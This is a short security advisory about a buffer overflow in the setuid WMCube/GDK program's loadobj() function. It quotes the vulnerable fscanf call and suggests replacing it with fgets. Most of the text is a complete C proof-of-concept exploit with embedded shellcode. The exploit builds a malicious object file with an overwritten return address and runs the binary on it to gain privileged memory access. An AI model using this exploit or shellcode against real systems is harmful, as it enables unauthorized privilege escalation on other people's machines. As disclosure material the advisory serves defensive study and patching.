|
|
|
|
| |
| WMCube / GDK is a modified and optimized version of WMCube 0.98. A security vulnerability in the product would allow an attacker to overflow one of the product's internal buffer and execute arbitrary code. Since the product is setuid kmem, privileged access to the memory can be gained. |
| |
Credit:
The information has been provided by bugtraq (GOBBLES Labs).
|
| |
Vulnerable code:
int loadobj(char *filename)
{
FILE *fp;
char tmp[64] = { "" };
int i = 0, counter = 1;
10:
...
fscanf(fp, "%s", tmp);
...
goto 10;
}
Workaround:
Replace fscanf(fp, "%s", tmp); in loadobj(), wmcube.c with fgets(tmp, 64, fp);.
Exploit:
/*
* (c) Andrew / GOBBLES Security
*
* PoC exploit for wmcube-gdk
*
* Usage: /path/to/GOBBLES-wmcube-gdk-exploit [offset]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
unsigned char GOBBLES_shellcode[] =
"\xb8\xf5\xf5\xff\xff\xf7\xd0\x50\xb8\xb3\xba\xac\xde\xf7\xd0\x50"
"\xb8\xb8\xb0\xbd\xbd\xf7\xd0\x50\x89\xe6\x31\xc0\x31\xdb\xb0\xf5"
"\xf6\xd0\x50\x56\x53\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";
int main(int argc, char **argv) {
FILE *fd;
int i;
u_long retaddy = 0xbfbff634;
if(argc == 2)
retaddy += atoi(argv[1]);
fd = fopen(".gobbles", "wt");
fprintf(fd, "WMCUBE_COORDINATES\n");
fprintf(fd, "1aaa"); // atoi()..
for(i = 0; i < 64; i += 8)
fprintf(fd, "GOBBLES!");
printf("GOBBLES: Using %lx as retaddy\n", retaddy);
fflush(NULL);
fwrite(&retaddy, 4, 1, fd);
fprintf(fd, "GOBBLES!");
fprintf(fd, "GOBBLES!");
fprintf(fd, "%s", GOBBLES_shellcode);
fprintf(fd, " 0 -42 42\n");
fprintf(fd, "WMCUBE_LINES\n");
fprintf(fd, "1 1\n");
fclose(fd);
execl("/usr/X11R6/bin/wmcube-gdk", "wmcube-gdk", "-o", ".gobbles", 0);
unlink(".gobbles"); /* Mum always told me to cleanup when im done! */
fprintf(stderr, "System immune against GOBBLES exploit!\n");
return 0;
}
|
|
|
|
|
